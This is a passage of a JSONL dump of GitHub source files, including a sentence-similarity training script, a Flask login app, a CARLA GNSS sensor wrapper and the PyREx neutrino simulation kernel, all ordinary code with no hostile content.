0\r\n if(wr1[1]==wr2[1]):\r\n maxd = 1\r\n else:\r\n if(swapped):\r\n tmp = getSimilarity(sim, wr1[1], wr2[1], returnCategory(df_features[\"Token_LemaPOS_Sent_2\"][index][wr1[1]]), returnCategory(df_features[\"Token_LemaPOS_Sent_1\"][index][wr2[1]]))\r\n else:\r\n tmp = getSimilarity(sim, wr1[1], wr2[1], returnCategory(df_features[\"Token_LemaPOS_Sent_1\"][index][wr1[1]]), returnCategory(df_features[\"Token_LemaPOS_Sent_2\"][index][wr2[1]]))\r\n if len(tmp)>0:\r\n d = tmp.max()\r\n else:\r\n d = 0\r\n if(h and maxh len(tagrelations2)):\r\n new_tagrelations1 = tagrelations2\r\n new_tagrelations2 = tagrelations1\r\n for tr1 in set(new_tagrelations1):\r\n for tr2 in set(new_tagrelations2):\r\n if(tr1[0]==tr2[0] and tr1[1]==tr2[1]):\r\n t=t+1\r\n break\r\n tagDepWtSum.append(t/(len(new_tagrelations1)));\r\n return alledgePathDepWtSum, edgePathDepWtSum, tagDepWtSum, setTagDepWtSum, setOvefitEdgePathDepWtSum\r\n \r\n\r\nfor sim in similarities:\r\n alledgePathDepWtSum, edgePathDepWtSum, tagDepWtSum, setTagDepWtSum, setOvefitEdgePathDepWtSum = getDependencyPairSim(sim)\r\n df_features['ALl_EdgePath_Dep_Wt_by_' + sim[0:3]] = alledgePathDepWtSum\r\n df_features['EdgePath_Dep_Wt_by_' + sim[0:3]] = edgePathDepWtSum\r\n df_features['Tag_Dep_Wt_by_' + sim[0:3]] = tagDepWtSum\r\n df_features['Set_Tag_Dep_Wt_by_' + sim[0:3]] = setTagDepWtSum\r\n df_features['Set_Ovefit_EdgePath_Dep_Wt_by_' + sim[0:3]] = setOvefitEdgePathDepWtSum\r\n \r\n\r\n# storing features in txt file\r\ndf_features.to_csv('df_features_traint.txt',sep='\\t',index=None)\r\n#\r\n##Split data into training and test sets\r\n#\r\n#\r\n#df_model_f=df_features.copy()\r\n#df_model_f.dropna(axis=0, how='any', thresh=None, subset=None, inplace=True)\r\n#df_model_f=df_model_f.drop(['id', 'Sentence1', 'Sentence2','Token_Sentence1',\r\n# 'Token_Sentence2', 'Common_tokens', 'PosTag_Sentence1',\r\n# 'PosTag_Sentence2', 'Lema_Sentence1', 'Lema_Sentence2',\r\n# 'PosTagLema_Sentence1', 'PosTagLema_Sentence2'],axis=1)\r\n##list_features=np.array([list(df_model_f['Normalized_NN']),\r\n## list(df_model_f['Normalized_VB']),\r\n## list(df_model_f['EdgePath_Dep_Wt']),\r\n## list(df_model_f['Tag_Dep_Wt'])])\r\n#list_features=np.array([\r\n# \r\n# list(df_model_f['Norm_NN_bypat']),\r\n# list(df_model_f['Norm_VB_bypat']),\r\n# list(df_model_f['Norm_NN_bylch']),\r\n# list(df_model_f['Norm_VB_bylch']),\r\n# list(df_model_f['Norm_NN_bywup']),\r\n# list(df_model_f['Norm_VB_bywup']),\r\n# list(df_model_f['Common_prepositions']),\r\n# \r\n# list(df_model_f['ALl_EdgePath_Dep_Wt_by_pat']),\r\n# list(df_model_f['EdgePath_Dep_Wt_by_pat']),\r\n# list(df_model_f['Tag_Dep_Wt_by_pat']),\r\n# list(df_model_f['Set_Tag_Dep_Wt_by_pat']),\r\n# list(df_model_f['Set_Ovefit_EdgePath_Dep_Wt_by_pat']),\r\n# \r\n# list(df_model_f['ALl_EdgePath_Dep_Wt_by_wup']),\r\n# list(df_model_f['EdgePath_Dep_Wt_by_wup']),\r\n# list(df_model_f['Tag_Dep_Wt_by_wup']),\r\n# list(df_model_f['Set_Tag_Dep_Wt_by_wup']),\r\n# list(df_model_f['Set_Ovefit_EdgePath_Dep_Wt_by_wup']),\r\n# \r\n# list(df_model_f['ALl_EdgePath_Dep_Wt_by_lch']),\r\n# list(df_model_f['EdgePath_Dep_Wt_by_lch']),\r\n# list(df_model_f['Tag_Dep_Wt_by_lch']),\r\n# list(df_model_f['Set_Tag_Dep_Wt_by_lch']),\r\n# list(df_model_f['Set_Ovefit_EdgePath_Dep_Wt_by_lch']),\r\n# \r\n# \r\n# ])\r\n#list_features=np.transpose(list_features)\r\n#X = list_features\r\n#ylabels = list(df_model_f['Gold Tag'])\r\n#\r\n##\r\n##def Majority_vote(X,ylabels):\r\n## import pickle\r\n## from sklearn.model_selection import train_test_split\r\n## X_train, X_test, y_train, y_test = train_test_split(X, ylabels, test_size=0.2,random_state=500,shuffle=False)\r\n## \r\n## ###Model_Building\r\n## #from sklearn import svm\r\n## from sklearn.ensemble import RandomForestClassifier\r\n## #from sklearn.linear_model import LinearRegression\r\n## from sklearn.linear_model import LogisticRegression\r\n## #\r\n## classifier=LogisticRegression(random_state=0, solver='lbfgs',multi_class='multinomial').fit(X_train, y_train)\r\n## classifier=classifier.fit(X_train,y_train)\r\n## \r\n## #save model\r\n## pkl_filename = \"Logistic_Regression.pkl\"\r\n## with open(pkl_filename, 'wb') as file:\r\n## pickle.dump(classifier, file)\r\n### c=classifier.predict(X_test)\r\n## \r\n## \r\n## classifier1 = RandomForestClassifier(n_estimators=100, max_depth=2,random_state=0)\r\n## classifier1=classifier1.fit(X_train,y_train)\r\n## \r\n## #Save Model\r\n## pkl_filename1 = \"Random_ForestClassifier.pkl\"\r\n## with open(pkl_filename1, 'wb') as file:\r\n## pickle.dump(classifier1, file)\r\n## \r\n### c1=classifier1.predict(X_test)\r\n## \r\n## \r\n### from sklearn.svm import SVC\r\n### classifier2 = SVC(kernel = 'linear', C = 1).fit(X_train, y_train)\r\n### c2 = classifier2.predict(X_test)\r\n## \r\n## from sklearn.naive_bayes import MultinomialNB\r\n## classifier3 = MultinomialNB()\r\n## classifier3=classifier3.fit(X, ylabels)\r\n## \r\n## #Save Model\r\n## pkl_filename2 = \"MultinomialNB.pkl\"\r\n## with open(pkl_filename2, 'wb') as file:\r\n## pickle.dump(classifier3, file)\r\n##\r\n## #Load models\r\n## with open(pkl_filename, 'rb') as file:\r\n## pickle_model = pickle.load(file)\r\n## c=pickle_model.predict(X_test)\r\n## with open(pkl_filename1, 'rb') as file:\r\n## pickle_model1 = pickle.load(file)\r\n## c1=pickle_model1.predict(X_test)\r\n## with open(pkl_filename2, 'rb') as file:\r\n## pickle_model2 = pickle.load(file)\r\n## c2=pickle_model2.predict(X_test)\r\n##\r\n## \r\n## \r\n## mvotedlabel=[]\r\n## for ind in range(len(c)):\r\n## if c[ind]==c1[ind] and c[ind]==c2[ind]:\r\n## mvotedlabel.append(c[ind])\r\n## elif c[ind]==c1[ind] and c[ind]!=c2[ind]:\r\n## mvotedlabel.append(c[ind]) \r\n## elif c1[ind]==c2[ind] and c[ind]!=c1[ind]:\r\n## mvotedlabel.append(c1[ind])\r\n## elif c[ind]==c2[ind] and c[ind]!=c1[ind]:\r\n## mvotedlabel.append(c[ind])\r\n## else:\r\n## #Random Forest\r\n## mvotedlabel.append(c1[ind])\r\n## \r\n## from sklearn import metrics\r\n## accuracy=metrics.accuracy_score(y_test, c)\r\n## accuracy1=metrics.accuracy_score(y_test, c1)\r\n## accuracy2=metrics.accuracy_score(y_test, c2)\r\n## \r\n## print(accuracy,accuracy1,accuracy2)\r\n## \r\n## accuracy3=metrics.accuracy_score(y_test, mvotedlabel)\r\n## print(\"Majority Vote\",accuracy3)\r\n##\r\n##\r\n##Accuracy_mvoted=Majority_vote(X,ylabels)\r\n","repo_name":"pygaganthon/Sentence-Similarity","sub_path":"mainTrainFile.py","file_name":"mainTrainFile.py","file_ext":"py","file_size_in_byte":38682,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"46271157674","text":"def main():\n\tterms = []\n\tfor i in range(100):\n\t\tif i == 0: terms.append(2)\n\t\telif (i+1)%3 == 0: terms.append(((i+1)/3)*2)\n\t\telse: terms.append(1)\n\tnumerador = terms[-1]\n\tdenominador = 1\n\tfor i in reversed(terms[:-1]):\n\t\t# Switch\n\t\ttemp = numerador\n\t\tnumerador = denominador\n\t\tdenominador = temp\n\n\t\tnumerador += denominador * i\n\t#print(str(numerador) + \"/\" + str(denominador))\n\tsum = 0\n\twhile (numerador) :\n\t\tsum += numerador % 10\n\t\tnumerador = numerador / 10\n\tprint(\"If you can trust me, the number you are looking for is \" + str(sum))\n\nmain()\n\n","repo_name":"PysKa-Ratzinger/personal_project_euler_solutions","sub_path":"solutions/051-075/65/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"19667404739","text":"# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,py\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.12.0\n# kernelspec:\n# display_name: Python 3.9.2 64-bit\n# name: python3\n# ---\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nplt.style.use(\"fivethirtyeight\")\n\n# +\nages_x = [25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35]\nx_indexes = np.arange(len(ages_x))\nwd = 0.25\n\ndev_y = [38496, 42000, 46752, 49320, 53200, 56000, 62316, 64928, 67317, 68748, 73752]\nplt.bar(x_indexes - wd, dev_y, width=wd, color=\"#444444\", label=\"All Devs\")\n\npy_dev_y = [45372, 48876, 53850, 57287, 63016, 65998, 70003, 70000, 71496, 75370, 83640]\nplt.bar(x_indexes, py_dev_y, width=wd, color=\"#008fd5\", label=\"Python\")\n\njs_dev_y = [37810, 43515, 46823, 49293, 53437, 56373, 62375, 66674, 68745, 68746, 74583]\nplt.bar(x_indexes + wd, js_dev_y, width=wd, color=\"#e5ae38\", label=\"JavaScript\")\n\nplt.legend()\nplt.xticks(ticks=x_indexes, labels=ages_x)\nplt.title(\"Median Salary (USD) by Age\")\nplt.xlabel(\"Ages\")\nplt.ylabel(\"Median Salary (USD)\")\n\n# plt.tight_layout()\n\nplt.show()\n\n# +\n# import csv\nimport pandas as pd\nfrom collections import Counter\n\n# with open('./data.csv') as csvFile:\n# csvReader = csv.DictReader(csvFile)\n\ndata = pd.read_csv(\"./data.csv\")\nids = data[\"Responder_id\"]\nlang_responses = data[\"LanguagesWorkedWith\"]\n\nlanguageCounter = Counter()\n\nfor response in lang_responses:\n languageCounter.update(response.split(\";\"))\n\nlanguages = []\npopularity = []\n\nfor item in languageCounter.most_common(15):\n languages.append(item[0])\n popularity.append(item[1])\n\n\nlanguages.reverse()\npopularity.reverse()\n\n# plt.bar(languages, popularity)\nplt.barh(languages, popularity)\n\nplt.title(\"Most Popular Languages\")\n# plt.xlabel('Programming Languages')\nplt.xlabel(\"Number of People Who Use\")\n\nplt.grid(False)\nplt.tight_layout()\nplt.show()\n","repo_name":"huibosa/programming","sub_path":"machine-learning/data-analysis/tutorial/matplotlib/demo/bar_chart.py","file_name":"bar_chart.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"73861412125","text":"import os\n\nfrom flask import (Flask, url_for, render_template, request,\n session, redirect, make_response)\nfrom sqlalchemy.orm import sessionmaker\n\nfrom db.users import Users, engine\nfrom utils.verify_code import CaptchaTool\n\napp = Flask(__name__, template_folder='../templates')\napp.secret_key = os.urandom(16)\n\n\n@app.route(\"/\")\ndef index():\n \"\"\"首页\"\"\"\n return render_template('login.html')\n\n\n@app.route('/login', methods=['POST'])\ndef login():\n \"\"\"登录\"\"\"\n # 获取用户名、密码、验证码\n username = request.form.get(\"username\")\n pwd = request.form.get('pwd', None)\n code = request.form.get('code', None)\n # 判断各项数据是否为空,通常前端会做这类判断并且验证数据格式,\n # 但是重要数据后端依然要做验证,防止恶意数据\n if not (username and pwd and code):\n return redirect(url_for('error_page',\n message='username, password or code cannot be none'))\n \"\"\"\n 先判断验证码是否正确,\n 不正确则打回(先判断原因:减少访问数据库次数,削减数据库压力,减少不必要的资源浪费)\n 正常的业务逻辑是在用户输入用户名或者密码或者验证码后,\n 使用ajax 或者axios 等发送异步请求查询是否有该用户,没有则局部刷新给用户提示信息\n 而不是现在这样直接打到错误页面,用户体验极差\n \"\"\"\n if code == session['code']:\n try:\n Session = sessionmaker(bind=engine)\n session_db = Session()\n user = session_db.query(Users.username, Users.pwd)\\\n .filter(Users.username == username, Users.pwd == pwd)\\\n .first()\n except Exception:\n # 通常这类异常需要交给全局异常处理器来处理,并且要细粒度捕捉,\n # 然后根据异常跳转到某个提示页面,优化用户体验\n return redirect(url_for('error_page', message='unknown error occured'))\n\n # 若表中有该用户,则在session中存储该用户信息\n if user:\n session['username'] = username\n session['user'] = user\n # flask 要求每个分支都要有返回值,可优化\n return redirect(url_for('go_main', username=username))\n return redirect(url_for('error_page', message='no user'))\n return redirect(url_for('error_page', message='wrong code'))\n\n\n@app.route('/main', methods=['GET'])\ndef go_main():\n \"\"\"主页\"\"\"\n # 判断session中是否有'user'属性,没有则表示当前客户端未登录,打回到登录页面\n if not session.get('user', None):\n return render_template('login.html')\n return render_template('main.html', username=session['username'])\n\n\n@app.route('/logout', methods=['GET', 'POST'])\ndef logout():\n \"\"\"退出\"\"\"\n if session.get('username') is not None:\n session.clear()\n return redirect(url_for('index'))\n return render_template('error.html', message='please login first!')\n\n\n@app.route('/errorPage/', methods=['GET', 'POST'])\ndef error_page(message):\n \"\"\"错误页面\"\"\"\n return render_template('error.html', message=message)\n\n\n@app.route('/getCaptcha', methods=[\"GET\"])\ndef test_get_captcha():\n \"\"\"\n 获取图形验证码\n :return:\n \"\"\"\n new_captcha = CaptchaTool()\n # 获取图形验证码\n img, code = new_captcha.get_verify_code()\n response = make_response(img)\n response.headers['Content-Type'] = 'image/gif'\n # 存入session\n session[\"code\"] = code\n return response\n","repo_name":"Yaocool/FlaskDemo","sub_path":"app/user_blueprint.py","file_name":"user_blueprint.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"27843057056","text":"from django.conf.urls import url\nfrom django.views.generic import TemplateView\n\nfrom ml_django import views\n\nurlpatterns = [\n url(r'^$', TemplateView.as_view(template_name='ml_django/main.html'), name='main'),\n url(r'^login/$', views.login, name='login'),\n url(r'^publications/$', views.Publications.as_view(), name='publications'),\n url(r'^create_publication/$', views.CreatePublication.as_view(), name='create_publication'),\n url(r'^logout/$', views.logout, name='logout')\n]\n","repo_name":"mateoBa/trend","sub_path":"ml_django/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"7934620032","text":"import glob\nimport os\nimport sys\ntry:\n sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (\n sys.version_info.major,\n sys.version_info.minor,\n 'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])\nexcept IndexError:\n pass\nimport carla\n\nimport numpy as np\nimport math\n\nimport weakref\n\nimport xml.etree.ElementTree as ET\n\nfrom queue import Queue\nfrom collections import OrderedDict\n\nfrom util import destroy_queue\n\nclass Gnss:\n def __init__(self, x, y, z):\n self.x = x\n self.y = y\n self.z = z\n\nclass Mechanism:\n def __init__(self, world, client, vehicle_transform):\n self.world = world\n self.client = client\n\n # Sensor noise profile \n NOISE_STDDEV = 5e-5\n NOISE_BIAS = 1e-5\n NOISE_GNSS_ALT_BIAS = NOISE_BIAS\n NOISE_GNSS_ALT_STDDEV = NOISE_STDDEV\n NOISE_GNSS_LAT_BIAS = NOISE_BIAS\n NOISE_GNSS_LAT_STDDEV = NOISE_STDDEV\n NOISE_GNSS_LON_BIAS = NOISE_BIAS\n NOISE_GNSS_LON_STDDEV = NOISE_STDDEV\n \n # Initialize the vehicle and the sensors\n # vehicle\n self.no_autopilot = True\n self.vehicle_name = 'vehicle.lincoln.mkz_2020'\n blueprint_library = world.get_blueprint_library()\n vehicle_bp = blueprint_library.find(self.vehicle_name)\n self.vehicle = world.spawn_actor(vehicle_bp, vehicle_transform)\n self.vehicle.set_autopilot(self.no_autopilot)\n # GPS\n gnss_bp = blueprint_library.filter(\"sensor.other.gnss\")[0]\n\n # Set sensors' noise\n gnss_bp.set_attribute('noise_alt_bias', str(NOISE_GNSS_ALT_BIAS))\n gnss_bp.set_attribute('noise_alt_stddev', str(NOISE_GNSS_ALT_STDDEV))\n gnss_bp.set_attribute('noise_lat_bias', str(NOISE_GNSS_LAT_BIAS))\n gnss_bp.set_attribute('noise_lat_stddev', str(NOISE_GNSS_LAT_STDDEV))\n gnss_bp.set_attribute('noise_lon_bias', str(NOISE_GNSS_LON_BIAS))\n gnss_bp.set_attribute('noise_lon_stddev', str(NOISE_GNSS_LON_STDDEV))\n\n # Sensor sampling frequency\n GNSS_FREQ = 1\n gnss_bp.set_attribute('sensor_tick', str(1.0 / GNSS_FREQ))\n\n self.gnss = world.spawn_actor(\n blueprint=gnss_bp,\n transform=carla.Transform(carla.Location(x=0, z=0)),\n attach_to=self.vehicle\n )\n\n self.actor_list = [self.vehicle, self.gnss]\n\n self.gnss_queue = Queue()\n\n # Hook sensor readings to callback methods\n weak_self = weakref.ref(self)\n self.gnss.listen(lambda data : Mechanism.sensor_callback(weak_self, data, self.gnss_queue))\n\n # Reference latitude and longitude (GNSS)\n self.gnss_lat_ref, self.gnss_long_ref = self._get_latlon_ref()\n\n def destroy(self):\n self.gnss.destroy()\n\n self.client.apply_batch([carla.command.DestroyActor(x) \n for x in self.actor_list if x is not None])\n\n destroy_queue(self.gnss_queue)\n\n\n def get_location(self):\n return self.vehicle.get_location() \n \n @staticmethod\n def sensor_callback(weak_self, data, queue):\n self = weak_self()\n if not self:\n return\n queue.put(data)\n\n def get_sensor_readings(self, frame):\n \"\"\"Return a dict containing the sensor readings\n at the particular frame\n\n :param frame: unique frame at the current world frame\n :type frame: int\n \"\"\"\n sensors = {'gnss': None}\n\n while not self.gnss_queue.empty():\n gnss_data = self.gnss_queue.get()\n #if gnss_data.frame == frame:\n\n alt = gnss_data.altitude\n lat = gnss_data.latitude\n long = gnss_data.longitude\n\n gps_xyz = self.gnss_to_xyz(lat, long, alt)\n sensors['gnss'] = gps_xyz\n \n self.gnss_queue.task_done()\n break\n\n #self.gnss_queue.task_done()\n\n return sensors\n\n def gnss_to_xyz(self, latitude, longitude, altitude):\n \"\"\"Creates Location from GPS (latitude, longitude, altitude).\n This is the inverse of the _location_to_gps method found in\n https://github.com/carla-simulator/scenario_runner/blob/master/srunner/tools/route_manipulation.py\n \n Modified from:\n https://github.com/erdos-project/pylot/blob/master/pylot/utils.py\n \"\"\"\n EARTH_RADIUS_EQUA = 6378137.0\n\n scale = math.cos(self.gnss_lat_ref * math.pi / 180.0)\n basex = scale * math.pi * EARTH_RADIUS_EQUA / 180.0 * self.gnss_long_ref\n basey = scale * EARTH_RADIUS_EQUA * math.log(\n math.tan((90.0 + self.gnss_lat_ref) * math.pi / 360.0))\n\n x = scale * math.pi * EARTH_RADIUS_EQUA / 180.0 * longitude - basex\n y = scale * EARTH_RADIUS_EQUA * math.log(\n math.tan((90.0 + latitude) * math.pi / 360.0)) - basey\n\n # This wasn't in the original method, but seems to be necessary.\n y *= -1\n\n return Gnss(x, y, altitude)\n\n def _get_latlon_ref(self):\n \"\"\"\n Convert from waypoints world coordinates to CARLA GPS coordinates\n :return: tuple with lat and lon coordinates\n https://github.com/carla-simulator/scenario_runner/blob/master/srunner/tools/route_manipulation.py\n \"\"\"\n xodr = self.world.get_map().to_opendrive()\n tree = ET.ElementTree(ET.fromstring(xodr))\n\n # default reference\n lat_ref = 42.0\n lon_ref = 2.0\n\n for opendrive in tree.iter(\"OpenDRIVE\"):\n for header in opendrive.iter(\"header\"):\n for georef in header.iter(\"geoReference\"):\n if georef.text:\n str_list = georef.text.split(' ')\n for item in str_list:\n if '+lat_0' in item:\n lat_ref = float(item.split('=')[1])\n if '+lon_0' in item:\n lon_ref = float(item.split('=')[1])\n return lat_ref, lon_ref","repo_name":"Mahdi-Rahmani/Localization","sub_path":"GPS_IMU/gps_only/mechanism.py","file_name":"mechanism.py","file_ext":"py","file_size_in_byte":5996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"27086809352","text":"\"\"\"\nModule for the simulation kernel.\n\nThe simulation kernel is responsible for running through the simulation\nchain by controlling classes and objects which will independently produce\nneutrinos, create corresponding signals, propagate the signals to antennas,\nand handle antenna processing of the signals.\n\n\"\"\"\n\nfrom collections.abc import Sequence\nimport logging\nimport numpy as np\nfrom pyrex.internal_functions import normalize\nfrom pyrex.signals import EmptySignal\nfrom pyrex.askaryan import AskaryanSignal\nfrom pyrex.ray_tracing import RayTracer\nfrom pyrex.ice_model import ice\n\nlogger = logging.getLogger(__name__)\n\n\nclass EventKernel:\n \"\"\"\n High-level kernel for controlling event simulation.\n\n The kernel is responsible for handling the classes and objects which\n control the major simulation steps: particle creation, signal production,\n signal propagation, and antenna response. The modular kernel structure\n allows for easy switching of the classes or objects which handle any of the\n simulation steps.\n\n Parameters\n ----------\n generator\n A particle generator to create neutrino events.\n antennas\n An iterable object consisting of antenna objects which can receive and\n store signals.\n ice_model : optional\n An ice model describing the ice surrounding the `antennas`.\n ray_tracer : optional\n A ray tracer capable of propagating signals from the neutrino vertex\n to the antenna positions.\n signal_model : optional\n A signal class which generates signals based on the particle.\n signal_times : array_like, optional\n The array of times over which the neutrino signal should be generated.\n event_writer : File, optional\n A file object to be used for writing data output.\n triggers : function or dict, optional\n A function or dictionary with function values representing trigger\n conditions of the detector. If a dictionary, must have a \"global\" key\n with its value representing the global detector trigger.\n offcone_max : float or None, optional\n The maximum angle away from the Cherenkov angle to be simulated.\n Antennas which view an event with an angle larger than this angle will\n skip the calculation of the Askaryan signal and assume no significant\n signal is seen. If `None`, no offcone cut is applied.\n weight_min : float or tuple or None, optional\n The minimum particle weight(s) which should be simulated. If a float,\n particles with a total weight less than this value will be skipped. If\n a tuple, particles with a survival weight less than the first element\n of the tuple or with an interaction weight less than the second element\n of the tuple will be skipped. If `None`, no minimum weight is applied.\n attenuation_interpolation : float or None, optional\n The logarithmic (base 10) interpolation step size to be used for\n interpolating attenuation along the ray path. If `None`, no\n interpolation of the attenuation is applied.\n\n Attributes\n ----------\n gen\n The particle generator responsible for particle creation.\n antennas\n The iterable of antennas responsible for handling applying their\n response and storing the resulting signals.\n ice\n The ice model describing the ice containing the `antennas`.\n ray_tracer\n The ray tracer responsible for signal propagation through the `ice`.\n signal_model\n The signal class to use to generate signals based on the particle.\n signal_times\n The array of times over which the neutrino signal should be generated.\n writer\n The file object to be used for writing data output.\n triggers\n The trigger condition(s) of the detector.\n offcone_max\n The maximum angle away from the Cherenkov angle to be simulated.\n weight_min\n The minimum particle weight(s) which should be simulated.\n attenuation_interpolation : float or None, optional\n The logarithmic (base 10) interpolation step size to be used for\n interpolating attenuation along the ray path.\n\n See Also\n --------\n pyrex.Event : Class for storing a tree of `Particle` objects\n representing an event.\n pyrex.Particle : Class for storing particle attributes.\n pyrex.ice_model.AntarcticIce : Class describing the ice at the south pole.\n pyrex.RayTracer : Class for calculating the ray-trace solutions between\n points.\n pyrex.AskaryanSignal : Class for generating Askaryan signals according to\n ARZ parameterization.\n pyrex.File : Class for reading or writing data files.\n\n Notes\n -----\n The kernel is designed to be modular so individual parts of the simulation\n chain can be exchanged. In order to interchange the pieces, their classes\n require the following at a minimum:\n\n The particle generator `generator` must have a ``create_event`` method\n which takes no arguments and returns a `Event` object consisting of\n `Particle` objects with ``vertex``, ``direction``, ``energy``, and\n ``weight`` attributes.\n\n The antenna iterable `antennas` must yield each antenna object once when\n iterating directly over `antennas`. Each antenna object must have a\n ``position`` attribute and a ``receive`` method which takes a signal object\n as its first argument, and ``ndarray`` objects as ``direction`` and\n ``polarization`` keyword arguments.\n\n The `ice_model` must have an ``index`` method returning the index of\n refraction given a (negative-valued) depth, and it must support anything\n required of it by the `ray_tracer`.\n\n The `ray_tracer` must be initialized with the particle vertex and an\n antenna position as its first two arguments, and the `ice_model` of the\n kernel as the ``ice_model`` keyword argument. The ray tracer must also have\n ``exists`` and ``solutions`` attributes, the first of which denotes whether\n any paths exist between the given points and the second of which is an\n iterable revealing each path between the points. These paths must have\n ``emitted_direction``, ``received_direction``, and ``path_length``\n attributes, as well as a ``propagate`` method which takes a signal object\n and applies the propagation effects of the path in-place to that object.\n\n The `signal_model` must be initialized with the `signal_times` array,\n a `Particle` object from the `Event`, the ``viewing_angle`` and\n ``viewing_distance`` according to the `ray_tracer`, and the `ice_model`.\n The object created should be a `Signal` object with ``times`` and\n ``values`` attributes representing the time-domain Askaryan signal produced\n by the `Particle`.\n\n \"\"\"\n def __init__(self, generator, antennas, ice_model=ice,\n ray_tracer=RayTracer, signal_model=AskaryanSignal,\n signal_times=np.linspace(-50e-9, 50e-9, 2000, endpoint=False),\n event_writer=None, triggers=None, offcone_max=40,\n weight_min=None, attenuation_interpolation=0.1):\n self.gen = generator\n self.antennas = antennas\n self.ice = ice_model\n self.ray_tracer = ray_tracer\n self.signal_model = signal_model\n self.signal_times = signal_times\n self.writer = event_writer\n self.triggers = triggers\n if offcone_max is None:\n self.offcone_max = np.radians(180)\n else:\n self.offcone_max = np.radians(offcone_max)\n if weight_min is None:\n self.weight_min = 0\n else:\n self.weight_min = weight_min\n self.attenuation_interpolation = attenuation_interpolation\n self._gen_count = self.gen.count\n if self.writer is not None:\n if not self.writer.is_open:\n logger.warning(\"Event writer was not open. Opening now.\")\n self.writer.open()\n if not self.writer.has_detector:\n self.writer.set_detector(antennas)\n # Add metadata about the classes used\n kernel_metadata = {\n \"detector_class\": str(type(self.antennas)),\n \"generator_class\": str(type(self.gen)),\n \"ice_model_class\": str(type(self.ice)),\n \"ray_tracer_class\": str(self.ray_tracer),\n \"signal_model_class\": str(self.signal_model),\n \"offcone_max\": np.degrees(self.offcone_max),\n \"attenuation_interpolation\": (self.attenuation_interpolation\n if self.attenuation_interpolation\n is not None else 0),\n }\n if isinstance(self.weight_min, Sequence):\n kernel_metadata[\"survival_weight_min\"] = self.weight_min[0]\n kernel_metadata[\"interaction_weight_min\"] = self.weight_min[1]\n else:\n kernel_metadata[\"weight_min\"] = self.weight_min\n try:\n kernel_metadata[\"earth_model_class\"] = str(type(\n self.gen.earth_model\n ))\n except AttributeError:\n pass\n self.writer.create_analysis_metadataset(\"sim_parameters\")\n self.writer.add_analysis_metadata(\"sim_parameters\", kernel_metadata)\n\n def event(self):\n \"\"\"\n Create a neutrino event and run it through the simulation chain.\n\n Creates a particle using the ``generator``, produces a signal from that\n event, propagates that signal through the ice according to the\n ``ice_model`` and the ``ray_tracer``, and passes it into the\n ``antennas`` for processing.\n\n Returns\n -------\n event : Event\n The neutrino event generated which is responsible for the waveforms\n on the antennas.\n triggered : bool, optional\n If the ``triggers`` parameter was specified, contains whether the\n global trigger condition of the detector was met.\n\n See Also\n --------\n pyrex.Event : Class for storing a tree of `Particle` objects\n representing an event.\n pyrex.Particle : Class for storing particle attributes.\n\n \"\"\"\n event = self.gen.create_event()\n ray_paths = []\n polarizations = []\n for i in range(len(self.antennas)):\n ray_paths.append([])\n polarizations.append([])\n for particle in event:\n logger.info(\"Processing event for %s\", particle)\n if isinstance(self.weight_min, Sequence):\n if ((particle.survival_weight is not None and\n particle.survival_weightself.offcone_max:\n raise ValueError(\"Viewing angle is larger than \"+\n \"offcone limit \"+\n str(np.degrees(self.offcone_max)))\n pulse = self.signal_model(\n times=self.signal_times,\n particle=particle,\n viewing_angle=psi,\n viewing_distance=path.path_length,\n ice_model=self.ice\n )\n except ValueError as err:\n logger.debug(\"Eliminating invalid Askaryan signal: %s\",\n err)\n ant.receive(\n EmptySignal(self.signal_times+path.tof,\n value_type=EmptySignal.Type.field)\n )\n else:\n ant_pulses, ant_pols = path.propagate(\n signal=pulse, polarization=nu_pol,\n attenuation_interpolation=self.attenuation_interpolation\n )\n ant.receive(\n ant_pulses,\n direction=path.received_direction,\n polarization=ant_pols\n )\n\n if self.triggers is None:\n triggered = None\n elif isinstance(self.triggers, dict):\n triggered = {key: trigger_func(self.antennas)\n for key, trigger_func in self.triggers.items()}\n else:\n triggered = self.triggers(self.antennas)\n\n if self.writer is not None:\n self.writer.add(event=event, triggered=triggered,\n ray_paths=ray_paths, polarizations=polarizations,\n events_thrown=self.gen.count-self._gen_count)\n\n self._gen_count = self.gen.count\n\n if triggered is None:\n return event\n elif isinstance(self.triggers, dict):\n return event, triggered['global']\n else:\n return event, triggered\n","repo_name":"bhokansonfasig/pyrex","sub_path":"pyrex/kernel.py","file_name":"kernel.py","file_ext":"py","file_size_in_byte":15422,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"86"} +{"seq_id":"17354066609","text":"import json\n\nfrom ..constants import (DEFECT_AMENDED, DEFECT_CLOSED, DEFECT_DELETED,\n DEFECT_OPENED, DEFECT_REOPENED, DEFECT_IMPORTED,\n DEFECT_LOCKED)\nfrom django.utils import timezone\n\ndef assert_datetime(datetime):\n if not isinstance(datetime, timezone.datetime):\n raise AssertionError(\"input value must be a datetime instance.\")\n\nclass ChangeHistory(object):\n def __init__(self):\n self.date_created = None\n self.description = None\n self.submitter = None\n \nclass DefectViewModel(object):\n def __init__(self, defect_events):\n if len(defect_events) == 0:\n raise Exception(\"No events were found for this defect\")\n self.last_sequence_nr = -1\n self.change_history = []\n self.locked = False\n self._replay_from(defect_events)\n \n def apply(self, event):\n assert_datetime(event['timestamp'])\n self.date_changed = event['timestamp']\n if event['event_type'] == DEFECT_IMPORTED:\n return self._on_imported(event)\n if event['event_type'] == DEFECT_OPENED:\n return self._on_opened(event)\n if event['event_type'] == 